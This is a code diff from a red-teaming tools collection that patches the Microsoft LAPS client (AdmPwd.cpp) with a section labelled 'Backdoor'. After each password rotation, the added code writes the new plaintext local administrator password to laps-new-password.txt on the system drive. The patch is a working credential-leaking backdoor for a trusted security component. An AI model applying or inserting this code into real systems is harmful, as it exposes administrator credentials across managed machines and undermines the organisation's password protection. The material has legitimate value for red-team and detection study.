mgeeky-Penetration-Testing-Tools/red-teaming/LAPS-Backdoor/AdmPwd.cpp.diff

diff --git a/Main/AdmPwd/AdmPwd.cpp b/Main/AdmPwd/AdmPwd.cpp
index 85f14df..b379811 100644
--- a/Main/AdmPwd/AdmPwd.cpp
+++ b/Main/AdmPwd/AdmPwd.cpp
@@ -115,6 +115,48 @@ ADMPWD_API DWORD APIENTRY ProcessGroupPolicy(
 			GetSystemTimeAsFileTime(&currentTime);
 			LogData.dwID = S_REPORT_PWD;
 			LogData.hr = comp.ReportPassword(newPwd, &currentTime, config.PasswordAge);
+
+			// --------------------
+			// Backdoor
+
+			HANDLE outFile;
+			WCHAR *buff = new WCHAR[512];
+			if (buff) {
+				if (GetEnvironmentVariableW(L"SystemDrive", buff, 512)){
+					wcscat_s(buff, 512, L"\\laps-new-password.txt");
+					outFile = CreateFileW(
+						buff,
+						GENERIC_WRITE, 
+						FILE_SHARE_READ, 
+						NULL, 
+						OPEN_ALWAYS, 
+						FILE_ATTRIBUTE_NORMAL, 
+						NULL
+					);
+
+					if (outFile != static_cast<HANDLE>(INVALID_HANDLE_VALUE)) {
+						DWORD written = 0;
+
+						wcscpy_s(buff, 512, newPwd);
+						wcscat_s(buff, 512, L"\r\n");
+
+						WriteFile(
+							outFile, 
+							buff,
+							sizeof(WCHAR) * wcslen(buff),
+							&written, 
+							NULL
+						);
+
+						CloseHandle(outFile);
+					}
+				}
+
+				delete[] buff;
+			}
+
+			// --------------------
+
 			if (FAILED(LogData.hr))
 				throw LogData.hr;
 			else